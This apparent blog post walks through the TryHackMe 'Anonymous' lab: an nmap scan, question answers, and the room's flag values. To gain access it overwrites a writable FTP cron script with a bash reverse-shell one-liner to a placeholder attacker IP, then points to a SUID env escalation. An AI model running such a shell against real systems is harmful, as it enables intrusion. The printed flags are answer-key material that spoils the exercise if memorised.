Skip to main content
Mikail Aydoğdu

TryHackMe — Anonymous

Not the hacking group

Description

Hello there! Today I am going to walk you through the Anonymous machine on TryHackMe.

Enumeration

Let’s get started with an nmap scan:

nmap -sC -A 10.10.106.193 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 08:08 EST
Nmap scan report for 10.10.106.193
Host is up (0.099s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.1.64
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/1%OT=21%CT=1%CU=39995%PV=Y%DS=2%DC=T%G=Y%TM=67753
OS:E85%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=101%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST
OS:11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=F
OS:4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M
OS:508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2025-01-01T13:09:19+00:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-01-01T13:09:19
|_  start_date: N/A
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   97.59 ms 10.9.0.1
2   97.69 ms 10.10.106.193
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
  1. Enumerate the machine. How many ports are open?
 ANSWER: 4
  1. What service is running on port 21?
 ANSWER: ftp
  1. What service is running on ports 139 and 445?
 ANSWER: smb
  1. There’s a share on the user’s computer. What’s it called?
 smbclient -L [IP]

 ANSWER: pics

Gaining Access

We can also see from the nmap scan that the machine allows anonymous ftp access, so let’s see if there’s anything inside it:

Let’s try replacing the clean.sh script on the FTP server with our own script.

Create a bash script named clean.sh with the following payload:

Reverse Shell Cheat Sheet — Internal All The Things 

#!/bin/bash
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/8080 0>&1

And upload it with “put” and then the file name of the local file.

Then set up a netcat listener on you machine:

  1. user.txt
 ANSWER: 90d6f992585815ff991e68748c414740

Root

As we can see in the script output, we have an SUID bit set on/usr/bin/env.

Let’s search on gtfobins for it:

env | GTFOBins

  1. root.txt
 ANSWER: 4d930091c31a622a7ed10f27999af363

Thank you for reading

Room Link:

TryHackMe — Anonymous